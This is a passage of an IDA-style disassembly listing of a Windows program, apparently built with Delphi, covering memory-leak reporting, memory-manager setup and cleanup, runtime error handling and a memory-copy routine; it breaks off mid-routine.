; =============== S U B R O U T I N E =======================================
sub_4000239C proc near ; CODE XREF: sub_400023F4+4C�p
; sub_40002540+A6�p ...
push ebx
push esi
push edi
mov esi, eax
mov edi, offset dword_4001E7BC
xor ebx, ebx
cmp dword ptr [edi], 0
jz short loc_400023EC
call sub_400022F0
test al, al
jz short loc_400023EC
mov eax, [edi]
mov edx, [eax]
dec edx
test edx, edx
jl short loc_400023E5
inc edx
xor eax, eax
loc_400023C2: ; CODE XREF: sub_4000239C+47�j
mov ecx, [edi]
cmp esi, [ecx+eax*4+4]
jnz short loc_400023E1
mov edx, [edi]
mov edx, [edx]
mov ecx, [edi]
mov edx, [ecx+edx*4]
mov ecx, [edi]
mov [ecx+eax*4+4], edx
mov edx, [edi]
dec dword ptr [edx]
mov bl, 1
jmp short loc_400023E5
; ---------------------------------------------------------------------------
loc_400023E1: ; CODE XREF: sub_4000239C+2C�j
inc eax
dec edx
jnz short loc_400023C2
loc_400023E5: ; CODE XREF: sub_4000239C+21�j
; sub_4000239C+43�j
mov ds:byte_4001E7C0, 0
loc_400023EC: ; CODE XREF: sub_4000239C+F�j
; sub_4000239C+18�j
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_4000239C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400023F4 proc near ; CODE XREF: sub_40002540+84�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
sub eax, offset byte_4001A044
shr eax, 5
shl eax, 8
mov edx, [ebp+arg_0]
lea esi, [edx+eax*8-1B800h]
lea ecx, [ebp+var_1C]
lea edx, [ebp+var_18]
mov eax, [ebp+var_4]
call sub_40002098
jmp loc_4000252B
; ---------------------------------------------------------------------------
loc_4000242E: ; CODE XREF: sub_400023F4+13D�j
mov eax, [ebp+var_18]
sub eax, 4
test byte ptr [eax], 1
jnz loc_4000251F
mov eax, [ebp+var_18]
call sub_4000239C
test al, al
jnz loc_4000251F
mov eax, [ebp+arg_0]
mov byte ptr [eax-1B801h], 0
xor ebx, ebx
mov eax, [ebp+var_18]
call sub_400022C0
mov edi, eax
test edi, edi
jnz loc_400024F3
mov eax, [ebp+var_18]
cmp dword ptr [eax], 100h
jnb loc_4000251B
mov eax, [ebp+var_18]
add eax, 4
mov eax, [eax]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jle loc_4000251B
mov eax, [ebp+var_4]
mov eax, [eax]
movzx eax, word ptr [eax+2]
sub eax, 0Dh
cmp eax, [ebp+var_C]
jle short loc_4000251B
mov eax, [ebp+var_18]
add eax, 8
mov [ebp+var_10], eax
mov [ebp+var_11], 1
mov eax, [ebp+var_C]
test eax, eax
jle short loc_400024DE
mov [ebp+var_20], eax
loc_400024B7: ; CODE XREF: sub_400023F4+E8�j
cmp [ebp+var_11], 0
jz short loc_400024CD
mov eax, [ebp+var_10]
cmp byte ptr [eax], 20h
jb short loc_400024CD
mov eax, [ebp+var_10]
cmp byte ptr [eax], 80h
jb short loc_400024D1
loc_400024CD: ; CODE XREF: sub_400023F4+C7�j
; sub_400023F4+CF�j
xor eax, eax
jmp short loc_400024D3
; ---------------------------------------------------------------------------
loc_400024D1: ; CODE XREF: sub_400023F4+D7�j
mov al, 1
loc_400024D3: ; CODE XREF: sub_400023F4+DB�j
mov [ebp+var_11], al
inc [ebp+var_10]
dec [ebp+var_20]
jnz short loc_400024B7
loc_400024DE: ; CODE XREF: sub_400023F4+BE�j
cmp [ebp+var_11], 0
jz short loc_4000251B
mov eax, [ebp+var_10]
cmp byte ptr [eax], 0
jnz short loc_4000251B
mov ebx, 1
jmp short loc_4000251B
; ---------------------------------------------------------------------------
loc_400024F3: ; CODE XREF: sub_400023F4+71�j
mov ebx, 2
loc_400024F8: ; CODE XREF: sub_400023F4+116�j
cmp edi, [esi+ebx*8]
jz short loc_4000250C
cmp dword ptr [esi+ebx*8], 0
jz short loc_4000250C
inc ebx
cmp ebx, 0FFh
jle short loc_400024F8
loc_4000250C: ; CODE XREF: sub_400023F4+107�j
; sub_400023F4+10D�j
cmp ebx, 0FFh
jg short loc_40002519
mov [esi+ebx*8], edi
jmp short loc_4000251B
; ---------------------------------------------------------------------------
loc_40002519: ; CODE XREF: sub_400023F4+11E�j
xor ebx, ebx
loc_4000251B: ; CODE XREF: sub_400023F4+80�j
; sub_400023F4+95�j ...
inc dword ptr [esi+ebx*8+4]
loc_4000251F: ; CODE XREF: sub_400023F4+43�j
; sub_400023F4+53�j
mov eax, [ebp+var_4]
mov eax, [eax]
movzx eax, word ptr [eax+2]
add [ebp+var_18], eax
loc_4000252B: ; CODE XREF: sub_400023F4+35�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_1C]
jbe loc_4000242E
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400023F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40002540 proc near ; CODE XREF: sub_40002BB4+24�p
var_27928 = byte ptr -27928h
var_27927 = byte ptr -27927h
var_27828 = byte ptr -27828h
var_20029 = byte ptr -20029h
var_1F828 = dword ptr -1F828h
var_1B828 = dword ptr -1B828h
var_1B824 = dword ptr -1B824h
var_1B820 = dword ptr -1B820h
var_1B81C = dword ptr -1B81Ch
var_1B818 = dword ptr -1B818h
var_1B814 = dword ptr -1B814h
var_1B810 = dword ptr -1B810h
var_1B80A = byte ptr -1B80Ah
var_1B809 = byte ptr -1B809h
var_1B808 = dword ptr -1B808h
var_1B801 = byte ptr -1B801h
var_1B800 = byte ptr -1B800h
var_1B004 = byte ptr -1B004h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push eax
mov eax, 27h
loc_40002549: ; CODE XREF: sub_40002540+11�j
add esp, 0FFFFF004h
push eax
dec eax
jnz short loc_40002549
mov eax, [ebp+var_4]
add esp, 0FFFFF6DCh
push ebx
push esi
push edi
lea eax, [ebp+var_1B800]
xor ecx, ecx
mov edx, 1B800h
call sub_40003580
lea eax, [ebp+var_1F828]
xor ecx, ecx
mov edx, 4000h
call sub_40003580
xor eax, eax
mov [ebp+var_1B808], eax
mov [ebp+var_1B801], 1
mov edi, ds:dword_4001C70C
jmp loc_4000261F
; ---------------------------------------------------------------------------
loc_4000259D: ; CODE XREF: sub_40002540+E5�j
mov eax, edi
call sub_40002058
mov ebx, eax
test ebx, ebx
jz short loc_4000261C
loc_400025AA: ; CODE XREF: sub_40002540+DA�j
mov eax, ebx
sub eax, 4
mov esi, [eax]
test esi, 1
jnz short loc_4000260F
test esi, 4
jz short loc_400025CC
push ebp
mov eax, ebx
call sub_400023F4
pop ecx
jmp short loc_4000260F
; ---------------------------------------------------------------------------
loc_400025CC: ; CODE XREF: sub_40002540+7F�j
cmp [ebp+var_1B808], 1000h
jge short loc_4000260F
and esi, 0FFFFFFF0h
sub esi, 4
mov [ebp+var_1B814], esi
mov eax, ebx
call sub_4000239C
test al, al
jnz short loc_4000260F
mov [ebp+var_1B801], 0
mov eax, [ebp+var_1B808]
mov edx, [ebp+var_1B814]
mov [ebp+eax*4+var_1F828], edx
inc [ebp+var_1B808]
loc_4000260F: ; CODE XREF: sub_40002540+77�j
; sub_40002540+8A�j ...
mov eax, ebx
call sub_40002034
mov ebx, eax
test ebx, ebx
jnz short loc_400025AA
loc_4000261C: ; CODE XREF: sub_40002540+68�j
mov edi, [edi+4]
loc_4000261F: ; CODE XREF: sub_40002540+58�j
cmp edi, offset dword_4001C708
jnz loc_4000259D
mov ebx, ds:dword_4001E7B0
jmp short loc_4000266A
; ---------------------------------------------------------------------------
loc_40002633: ; CODE XREF: sub_40002540+13C�j
mov eax, ebx
add eax, 10h
call sub_4000239C
test al, al
jnz short loc_40002667
mov [ebp+var_1B801], 0
mov esi, [ebx+0Ch]
and esi, 0FFFFFFF0h
sub esi, 4
sub esi, 10h
mov eax, [ebp+var_1B808]
mov [ebp+eax*4+var_1F828], esi
inc [ebp+var_1B808]
loc_40002667: ; CODE XREF: sub_40002540+FF�j
mov ebx, [ebx+4]
loc_4000266A: ; CODE XREF: sub_40002540+F1�j
cmp ebx, offset dword_4001E7AC
jz short loc_4000267E
cmp [ebp+var_1B808], 1000h
jl short loc_40002633
loc_4000267E: ; CODE XREF: sub_40002540+130�j
cmp [ebp+var_1B801], 0
jnz loc_400028E3
mov [ebp+var_1B809], 0
xor eax, eax
mov [ebp+var_1B818], eax
lea edx, [ebp+var_27828]
mov eax, offset aAnUnexpectedMe ; "An unexpected memory leak has occurred."...
mov ecx, 28h
call sub_400021F0
mov ebx, eax
mov [ebp+var_1B810], 37h
mov [ebp+var_1B824], offset word_4001A046
lea eax, [ebp+var_1B004]
mov [ebp+var_1B828], eax
loc_400026D1: ; CODE XREF: sub_40002540+2F1�j
mov eax, [ebp+var_1B824]
movzx eax, word ptr [eax]
sub eax, 4
mov [ebp+var_1B81C], eax
mov [ebp+var_1B80A], 0
mov edi, 0FFh
mov eax, [ebp+var_1B828]
mov esi, eax
loc_400026F7: ; CODE XREF: sub_40002540+2C8�j
lea eax, [ebp+var_20029]
cmp ebx, eax
ja loc_4000280E
cmp dword ptr [esi], 0
jbe loc_40002801
cmp [ebp+var_1B809], 0
jnz short loc_40002731
mov eax, offset aTheUnexpectedS ; "The unexpected small block leaks are:\r\n"...
mov ecx, 27h
mov edx, ebx
call sub_400021F0
mov ebx, eax
mov [ebp+var_1B809], 1
loc_40002731: ; CODE XREF: sub_40002540+1D5�j
cmp [ebp+var_1B80A], 0
jnz short loc_40002789
mov byte ptr [ebx], 0Dh
inc ebx
mov byte ptr [ebx], 0Ah
inc ebx
mov eax, [ebp+var_1B818]
inc eax
mov edx, ebx
call sub_400020D4
mov ebx, eax
mov byte ptr [ebx], 20h
inc ebx
mov byte ptr [ebx], 2Dh
inc ebx
mov byte ptr [ebx], 20h
inc ebx
mov edx, ebx
mov eax, [ebp+var_1B81C]
call sub_400020D4
mov ebx, eax
mov eax, offset aBytes ; " bytes: "
mov ecx, 8
mov edx, ebx
call sub_400021F0
mov ebx, eax
mov [ebp+var_1B80A], 1
jmp short loc_40002791
; ---------------------------------------------------------------------------
loc_40002789: ; CODE XREF: sub_40002540+1F8�j
mov byte ptr [ebx], 2Ch
inc ebx
mov byte ptr [ebx], 20h
inc ebx
loc_40002791: ; CODE XREF: sub_40002540+247�j
mov eax, edi
sub eax, 1
jb short loc_4000279C
jz short loc_400027B1
jmp short loc_400027C6
; ---------------------------------------------------------------------------
loc_4000279C: ; CODE XREF: sub_40002540+256�j
mov eax, offset aUnknown ; "Unknown"
mov ecx, 7
mov edx, ebx
call sub_400021F0
mov ebx, eax
jmp short loc_400027EA
; ---------------------------------------------------------------------------
loc_400027B1: ; CODE XREF: sub_40002540+258�j
mov eax, offset aString ; "String"
mov ecx, 6
mov edx, ebx
call sub_400021F0
mov ebx, eax
jmp short loc_400027EA
; ---------------------------------------------------------------------------
loc_400027C6: ; CODE XREF: sub_40002540+25A�j
lea edx, [ebp+var_27928]
mov eax, [esi-4]
call sub_40003C6C
movzx ecx, [ebp+var_27928]
lea eax, [ebp+var_27927]
mov edx, ebx
call sub_400021F0
mov ebx, eax
loc_400027EA: ; CODE XREF: sub_40002540+26F�j
; sub_40002540+284�j
mov byte ptr [ebx], 20h
inc ebx
mov byte ptr [ebx], 78h
inc ebx
mov byte ptr [ebx], 20h
inc ebx
mov eax, [esi]
mov edx, ebx
call sub_400020D4
mov ebx, eax
loc_40002801: ; CODE XREF: sub_40002540+1C8�j
dec edi
sub esi, 8
cmp edi, 0FFFFFFFFh
jnz loc_400026F7
loc_4000280E: ; CODE XREF: sub_40002540+1BF�j
mov eax, [ebp+var_1B81C]
mov [ebp+var_1B818], eax
add [ebp+var_1B828], 800h
add [ebp+var_1B824], 20h
dec [ebp+var_1B810]
jnz loc_400026D1
cmp [ebp+var_1B808], 0
jle short loc_400028BA
cmp [ebp+var_1B809], 0
jz short loc_40002859
mov byte ptr [ebx], 0Dh
inc ebx
mov byte ptr [ebx], 0Ah
inc ebx
mov byte ptr [ebx], 0Dh
inc ebx
mov byte ptr [ebx], 0Ah
inc ebx
loc_40002859: ; CODE XREF: sub_40002540+307�j
mov eax, offset aTheSizesOfUnex ; "The sizes of unexpected leaked medium a"...
mov ecx, 3Ch
mov edx, ebx
call sub_400021F0
mov ebx, eax
mov edi, [ebp+var_1B808]
dec edi
test edi, edi
jb short loc_400028BA
inc edi
mov [ebp+var_1B820], 0
lea esi, [ebp+var_1F828]
loc_40002888: ; CODE XREF: sub_40002540+378�j
cmp [ebp+var_1B820], 0
jz short loc_40002899
mov byte ptr [ebx], 2Ch
inc ebx
mov byte ptr [ebx], 20h
inc ebx
loc_40002899: ; CODE XREF: sub_40002540+34F�j
mov eax, [esi]
mov edx, ebx
call sub_400020D4
mov ebx, eax
lea eax, [ebp+var_20029]
cmp ebx, eax
ja short loc_400028BA
inc [ebp+var_1B820]
add esi, 4
dec edi
jnz short loc_40002888
loc_400028BA: ; CODE XREF: sub_40002540+2FE�j
; sub_40002540+335�j ...
mov eax, offset asc_4000299C ; "\r\n"
mov ecx, 3
mov edx, ebx
call sub_400021F0
push 2010h
push offset aUnexpectedMemo ; "Unexpected Memory Leak"
lea eax, [ebp+var_27828]
push eax
push 0
call sub_400011B0 ; MessageBoxA
loc_400028E3: ; CODE XREF: sub_40002540+145�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40002540 endp
; ---------------------------------------------------------------------------
align 4
aAnUnexpectedMe db 'An unexpected memory leak has occurred. ',0
; DATA XREF: sub_40002540+160�o
align 4
aTheUnexpectedS db 'The unexpected small block leaks are:',0Dh,0Ah,0
; DATA XREF: sub_40002540+1D7�o
aBytes db ' bytes: ',0 ; DATA XREF: sub_40002540+22D�o
align 4
aUnknown db 'Unknown',0 ; DATA XREF: sub_40002540:loc_4000279C�o
aString db 'String',0 ; DATA XREF: sub_40002540:loc_400027B1�o
align 4
aTheSizesOfUnex db 'The sizes of unexpected leaked medium and large blocks are: ',0
; DATA XREF: sub_40002540:loc_40002859�o
align 4
asc_4000299C db 0Dh,0Ah,0 ; DATA XREF: sub_40002540:loc_400028BA�o
align 10h
aUnexpectedMemo db 'Unexpected Memory Leak',0 ; DATA XREF: sub_40002540+390�o
align 4
; =============== S U B R O U T I N E =======================================
sub_400029B8 proc near ; CODE XREF: sub_400029FC+DD�p
push esi
push edi
xor eax, eax
xor esi, esi
mov edx, offset word_4001A046
loc_400029C3: ; CODE XREF: sub_400029B8+3D�j
cmp ds:byte_4001C706, 0
jz short loc_400029D1
test byte ptr [edx], 0Fh
jnz short loc_400029EE
loc_400029D1: ; CODE XREF: sub_400029B8+12�j
movzx edi, word ptr [edx]
shr edi, 3
mov ecx, esi
add ecx, ecx
add ecx, ecx
cmp edi, eax
jbe short loc_400029EC
loc_400029E1: ; CODE XREF: sub_400029B8+32�j
mov ds:byte_4001C5C0[eax], cl
inc eax
cmp edi, eax
ja short loc_400029E1
loc_400029EC: ; CODE XREF: sub_400029B8+27�j
mov eax, edi
loc_400029EE: ; CODE XREF: sub_400029B8+17�j
inc esi
add edx, 20h
cmp esi, 37h
jnz short loc_400029C3
pop edi
pop esi
retn
sub_400029B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400029FC proc near ; CODE XREF: .itext:4001900D�p
push ebx
push esi
push edi
mov esi, 37h
mov ebx, offset off_4001A060
loc_40002A09: ; CODE XREF: sub_400029FC+D7�j
cmp dword ptr [ebx], 0
jnz short loc_40002A14
mov dword ptr [ebx], offset sub_40001484
loc_40002A14: ; CODE XREF: sub_400029FC+10�j
lea eax, [ebx-1Ch]
mov [ebx-8], eax
lea eax, [ebx-1Ch]
mov [ebx-18h], eax
xor eax, eax
mov [ebx-10h], eax
mov dword ptr [ebx-14h], 1
movzx eax, word ptr [ebx-1Ah]
add eax, eax
add eax, eax
lea eax, [eax+eax*2]
add eax, 0EFh
and eax, 0FFFFFF00h
add eax, 30h
cmp eax, 0B30h
jnb short loc_40002A50
mov eax, 0B30h
loc_40002A50: ; CODE XREF: sub_400029FC+4D�j
add eax, 4D0h
shr eax, 0Dh
cmp eax, 7
jbe short loc_40002A62
mov eax, 7
loc_40002A62: ; CODE XREF: sub_400029FC+5F�j
mov ecx, eax
mov dl, 0FFh
shl dl, cl
mov [ebx-1Bh], dl
shl eax, 0Dh
add ax, 0B30h
mov [ebx-4], ax
movzx edi, word ptr [ebx-1Ah]
movzx eax, di
mov ecx, eax
shl ecx, 4
lea ecx, [ecx+ecx*2]
add ecx, 0EFh
and ecx, 0FFFFFF00h
add ecx, 30h
cmp ecx, 7330h
jnb short loc_40002AA1
mov ecx, 7330h
loc_40002AA1: ; CODE XREF: sub_400029FC+9E�j
cmp ecx, 0FF30h
jbe short loc_40002AAE
mov ecx, 0FF30h
loc_40002AAE: ; CODE XREF: sub_400029FC+AB�j
mov eax, ecx
sub eax, 20h
movzx edx, di
mov ecx, edx
xor edx, edx
div ecx
imul di
add ax, 0EFh
and ax, 0FF00h
add ax, 30h
mov [ebx-2], ax
add ebx, 20h
dec esi
jnz loc_40002A09
call sub_400029B8
mov ds:dword_4001C708, offset dword_4001C708
mov ds:dword_4001C70C, offset dword_4001C708
mov esi, 400h
mov edx, offset off_4001C7A8
loc_40002AFC: ; CODE XREF: sub_400029FC+10B�j
mov eax, edx
mov [eax], eax
mov [eax+4], eax
add edx, 8
dec esi
jnz short loc_40002AFC
mov ds:dword_4001E7AC, offset dword_4001E7AC
mov ds:dword_4001E7B0, offset dword_4001E7AC
pop edi
pop esi
pop ebx
retn
sub_400029FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002B24 proc near ; CODE XREF: sub_40002BB4:loc_40002BFF�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_4001C708
mov esi, offset dword_4001E7AC
mov edi, [ebx+4]
jmp short loc_40002B49
; ---------------------------------------------------------------------------
loc_40002B37: ; CODE XREF: sub_40002B24+27�j
mov ebp, [edi+4]
push 8000h
push 0
push edi
call sub_400012CC ; VirtualFree
mov edi, ebp
loc_40002B49: ; CODE XREF: sub_40002B24+11�j
cmp edi, ebx
jnz short loc_40002B37
mov edx, 37h
mov eax, offset byte_4001A044
loc_40002B57: ; CODE XREF: sub_40002B24+4D�j
mov ecx, eax
mov [eax+14h], ecx
mov ecx, eax
mov [eax+4], ecx
mov dword ptr [eax+8], 1
xor ecx, ecx
mov [eax+0Ch], ecx
add eax, 20h
dec edx
jnz short loc_40002B57
mov [ebx], ebx
mov [ebx+4], ebx
mov edx, 400h
mov ecx, offset off_4001C7A8
loc_40002B82: ; CODE XREF: sub_40002B24+69�j
mov eax, ecx
mov [eax], eax
mov [eax+4], eax
add ecx, 8
dec edx
jnz short loc_40002B82
mov ebx, [esi+4]
jmp short loc_40002BA6
; ---------------------------------------------------------------------------
loc_40002B94: ; CODE XREF: sub_40002B24+84�j
mov edi, [ebx+4]
push 8000h
push 0
push ebx
call sub_400012CC ; VirtualFree
mov ebx, edi
loc_40002BA6: ; CODE XREF: sub_40002B24+6E�j
cmp ebx, esi
jnz short loc_40002B94
mov [esi], esi
mov [esi+4], esi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40002B24 endp
; =============== S U B R O U T I N E =======================================
sub_40002BB4 proc near ; CODE XREF: sub_40006350+37�p
cmp ds:dword_4001E7C4, 0
jz short loc_40002BCF
mov eax, ds:dword_4001E7C4
push eax
call sub_400012DC ; DestroyWindow
xor eax, eax
mov ds:dword_4001E7C4, eax
loc_40002BCF: ; CODE XREF: sub_40002BB4+7�j
cmp ds:byte_4001C5B4, 0
jz short loc_40002BDD
call sub_40002540
loc_40002BDD: ; CODE XREF: sub_40002BB4+22�j
cmp ds:dword_4001E7BC, 0
jz short loc_40002BFF
push 8000h
push 0
mov eax, ds:dword_4001E7BC
push eax
call sub_400012CC ; VirtualFree
xor eax, eax
mov ds:dword_4001E7BC, eax
loc_40002BFF: ; CODE XREF: sub_40002BB4+30�j
call sub_40002B24
retn
sub_40002BB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002C08 proc near ; CODE XREF: sub_4000C5D0+45�p
test eax, eax
jz short locret_40002C16
call off_4001A730
test eax, eax
jz short loc_40002C18
locret_40002C16: ; CODE XREF: sub_40002C08+2�j
rep retn
; ---------------------------------------------------------------------------
loc_40002C18: ; CODE XREF: sub_40002C08+C�j
mov al, 1
jmp sub_40002D50
sub_40002C08 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40002C20 proc near ; CODE XREF: sub_40003C80+A�p
; sub_40004948+C�p ...
test eax, eax
jle short loc_40002C37
call off_4001A724
test eax, eax
jz short loc_40002C30
rep retn
; ---------------------------------------------------------------------------
loc_40002C30: ; CODE XREF: sub_40002C20+C�j
mov al, 1
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_40002C37: ; CODE XREF: sub_40002C20+2�j
xor eax, eax
rep retn
sub_40002C20 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002C3C proc near ; CODE XREF: sub_40003C9C+C�p
; sub_40004884+1C�p ...
test eax, eax
jz short locret_40002C4A
call off_4001A728
test eax, eax
jnz short loc_40002C4C
locret_40002C4A: ; CODE XREF: sub_40002C3C+2�j
rep retn
; ---------------------------------------------------------------------------
loc_40002C4C: ; CODE XREF: sub_40002C3C+C�j
mov al, 2
jmp sub_40002D50
sub_40002C3C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40002C54 proc near ; CODE XREF: sub_40004F74+22�p
; sub_4000599C+BA�p ...
mov ecx, [eax]
test ecx, ecx
jz short loc_40002C8C
test edx, edx
jz short loc_40002C76
push eax
mov eax, ecx
call off_4001A72C
pop ecx
or eax, eax
jz short loc_40002C85
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40002C6F: ; CODE XREF: sub_40002C54+2E�j
mov al, 2
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_40002C76: ; CODE XREF: sub_40002C54+8�j
mov [eax], edx
mov eax, ecx
call off_4001A728
or eax, eax
jnz short loc_40002C6F
retn
; ---------------------------------------------------------------------------
loc_40002C85: ; CODE XREF: sub_40002C54+16�j
; sub_40002C54+48�j
mov al, 1
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_40002C8C: ; CODE XREF: sub_40002C54+4�j
test edx, edx
jz short locret_40002CA0
push eax
mov eax, edx
call off_4001A724
pop ecx
or eax, eax
jz short loc_40002C85
mov [ecx], eax
locret_40002CA0: ; CODE XREF: sub_40002C54+3A�j
retn
sub_40002C54 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002CA4 proc near ; CODE XREF: sub_4000E068+6�p
; sub_4000E068:loc_4000E093�p ...
call sub_40006428
cmp dword ptr [eax+0], 0
jz short loc_40002CC1
call sub_40006428
mov eax, [eax+0]
mov eax, [eax+8]
retn
; ---------------------------------------------------------------------------
loc_40002CC1: ; CODE XREF: sub_40002CA4+C�j
xor eax, eax
retn
sub_40002CA4 endp
; =============== S U B R O U T I N E =======================================
sub_40002CC4 proc near ; CODE XREF: sub_4000E068:loc_4000E0DB�p
push ebx
push esi
call sub_40006428
cmp dword ptr [eax+0], 0
jz short loc_40002CEE
call sub_40006428
mov esi, [eax+0]
mov ebx, [esi+8]
call sub_40006428
xor eax, eax
mov [esi+8], eax
jmp short loc_40002CF0
; ---------------------------------------------------------------------------
loc_40002CEE: ; CODE XREF: sub_40002CC4+E�j
xor ebx, ebx
loc_40002CF0: ; CODE XREF: sub_40002CC4+28�j
mov eax, ebx
pop esi
pop ebx
retn
sub_40002CC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40002CF8 proc near ; CODE XREF: sub_40002D04+41�p
; .text:40004425�p
mov dword_4001A004, edx
call sub_4000486C
sub_40002CF8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40002D04 proc near ; CODE XREF: sub_40002D50+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:off_4001C008, 0
jz short loc_40002D20
mov edx, esi
mov eax, ebx
call ds:off_4001C008
loc_40002D20: ; CODE XREF: sub_40002D04+10�j
test bl, bl
jnz short loc_40002D31
call sub_40006428
mov ebx, [eax+4]
jmp short loc_40002D40
; ---------------------------------------------------------------------------
loc_40002D31: ; CODE XREF: sub_40002D04+1E�j
cmp bl, 18h
ja short loc_40002D40
movzx eax, bl
movzx ebx, byte_4001A73C[eax]
loc_40002D40: ; CODE XREF: sub_40002D04+2B�j
; sub_40002D04+30�j
movzx eax, bl
mov edx, esi
call sub_40002CF8
sub_40002D04 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40002D50 proc near ; CODE XREF: sub_40002C08+12�j
; sub_40002C20+12�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_40002D04
sub_40002D50 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40002D5C proc near ; CODE XREF: sub_4000AF68+28�p
; .itext:400199F0�p ...
push eax
push edx
push ecx
call sub_40006428
cmp dword ptr [eax+4], 0
pop ecx
pop edx
pop eax
jnz short loc_40002D71
retn
; ---------------------------------------------------------------------------
loc_40002D71: ; CODE XREF: sub_40002D5C+12�j
xor eax, eax
jmp sub_40002D50
sub_40002D5C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002D7C proc near ; CODE XREF: sub_40002D8C+5�p
; sub_40003390+3C�p ...
push ebx
mov ebx, eax
call sub_40006428
mov [eax+4], ebx
pop ebx
retn
sub_40002D7C endp
; =============== S U B R O U T I N E =======================================
sub_40002D8C proc near ; CODE XREF: sub_4000361C+17�p
call sub_400011D8 ; RtlGetLastWin32Error
call sub_40002D7C
retn
sub_40002D8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002D98 proc near ; CODE XREF: sub_4001293C+AB�p
arg_0 = dword ptr 4
push esi
push edi
mov esi, eax
mov edi, [esp+8+arg_0]
xor eax, eax
or al, [esi]
jz short loc_40002DD1
test edx, edx
jle short loc_40002DC2
cmp edx, eax
jg short loc_40002DC9
loc_40002DAE: ; CODE XREF: sub_40002D98+2F�j
sub eax, edx
inc eax
test ecx, ecx
jl short loc_40002DC9
cmp ecx, eax
jg short loc_40002DCD
loc_40002DB9: ; CODE XREF: sub_40002D98+33�j
; sub_40002D98+37�j
add esi, edx
mov [edi], cl
inc edi
rep movsb
jmp short loc_40002DD3
; ---------------------------------------------------------------------------
loc_40002DC2: ; CODE XREF: sub_40002D98+10�j
mov edx, 1
jmp short loc_40002DAE
; ---------------------------------------------------------------------------
loc_40002DC9: ; CODE XREF: sub_40002D98+14�j
; sub_40002D98+1B�j
xor ecx, ecx
jmp short loc_40002DB9
; ---------------------------------------------------------------------------
loc_40002DCD: ; CODE XREF: sub_40002D98+1F�j
mov ecx, eax
jmp short loc_40002DB9
; ---------------------------------------------------------------------------
loc_40002DD1: ; CODE XREF: sub_40002D98+C�j
mov [edi], al
loc_40002DD3: ; CODE XREF: sub_40002D98+28�j
pop edi
pop esi
retn 4
sub_40002D98 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002DDC proc near ; CODE XREF: sub_4000B230+7�p
push ebx
call sub_40006428
mov ebx, [eax+4]
call sub_40006428
xor edx, edx
mov [eax+4], edx
mov eax, ebx
pop ebx
retn
sub_40002DDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002DFC proc near ; CODE XREF: sub_400021F0+A�p
; sub_40003328+4F�p ...
cmp eax, edx
jz short locret_40002E31
cmp ecx, 20h
ja short loc_40002E81
sub ecx, 8
jg short loc_40002E11
jmp ds:off_40002E54[ecx*4]
; ---------------------------------------------------------------------------
loc_40002E11: ; CODE XREF: sub_40002DFC+C�j
fild qword ptr [ecx+eax]
fild qword ptr [eax]
cmp ecx, 8
jle short loc_40002E2C
fild qword ptr [eax+8]
cmp ecx, 10h
jle short loc_40002E29
fild qword ptr [eax+10h]
fistp qword ptr [edx+10h]
loc_40002E29: ; CODE XREF: sub_40002DFC+25�j
fistp qword ptr [edx+8]
loc_40002E2C: ; CODE XREF: sub_40002DFC+1D�j
fistp qword ptr [edx]
fistp qword ptr [ecx+edx]
locret_40002E31: ; CODE XREF: sub_40002DFC+2�j
; DATA XREF: sub_40002DFC+38�o
retn
; ---------------------------------------------------------------------------
align 4
dd offset locret_40002E31
dd offset loc_40002EB2
dd offset loc_40002EB8
dd offset loc_40002EBF
dd offset loc_40002ECC
dd offset loc_40002ED1
dd offset loc_40002EDC
dd offset loc_40002EE9
off_40002E54 dd offset loc_40002EF4 ; DATA XREF: sub_40002DFC+E�r
; ---------------------------------------------------------------------------
loc_40002E58: ; CODE XREF: sub_40002DFC+89�j
; sub_40002DFC+92�j
push edx
fild qword ptr [eax]
